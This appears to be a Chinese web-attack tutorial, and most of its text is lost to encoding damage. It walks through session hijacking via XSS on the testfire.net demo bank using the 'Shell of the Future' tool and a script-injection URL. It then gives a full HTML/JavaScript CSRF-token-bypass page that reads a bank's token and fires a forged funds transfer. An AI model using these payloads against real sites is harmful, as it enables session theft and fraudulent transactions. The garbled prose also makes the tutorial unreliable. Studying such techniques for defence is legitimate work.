????3??????????????http://127.0.0.1:8008/sotf.console (firefoxЧ????)
????4??????????????????????檔??Shell of the Future??????JavaScript??exp- e1.js??e2.js?????????????XSS???????????????????????

 ??

????5??????????????????????????
????http://www.testfire.net/bank/login.aspx (admin/admin)
????????????????????????XSS?????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E
????6???????????????????????????????£?
????http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E
????7????????????????????IP??????????????????????“Hijack Session”??

????8?????Hijack Session???????????????棺

???????????CSRF?????token??
?????????????????????token??????CSRF??????????????HTML5???????????????????п????????CSRF??token?????CSRF token??????URL(GET????)?????????????CORSЭ?飬???????????????CSRF payload??????????????????????????????????????????HTTP ????“origin”??????????????????withCredentials?true??????????????????????
????1?????????www.bank.com??
????2????????????CSRF????????????????????????????token???????GET????????????????????£?
????<input type=”hidden” id=”test” name=”csrfToken” value=”12345678″ />
???????????£?
????http://www.bank.com/Confirmation.jsp?value=200&csrfToken=1234234523
????3???????????email??IM????????????????????????????ww.attackersite.com
????4????????????????Ajax????www.bank.com????????Щ????????????????CSRF??token???
????5???????????????????token???????????CSRF??????
????6?????????д?????????δ???????Ajax????ConfirmTransfer.jsp??沢????????????????????????????csrfToken??????????????Ajax????????????а?????CSRF token??

 

<!DOCTYPE html> <html> <head> <script> function testing() { var xmlhttp; if (window.XMLHttpRequest) { xmlhttp=new XMLHttpRequest(); } else { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } xmlhttp.open("GET"??"http://bank/Myapp/ConfirmTransfer.jsp"??false); xmlhttp.send(); if(xmlhttp.status==200) { var str=xmlhttp.responseText; var n=str.search("csrfToken"); var final=str.substring(n+18??n+28); var url = "http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&amp;Account=1234&amp;csrfToken=" + escape(final); xmlhttp.open("GET"?? url?? true); xmlhttp.send(); } } </script> </head> <body onload="testing();"> </body> </html>

???????????в???????????У???????????飬??????HTML5?У??????????????????CSRF TOKEN??????Щ??????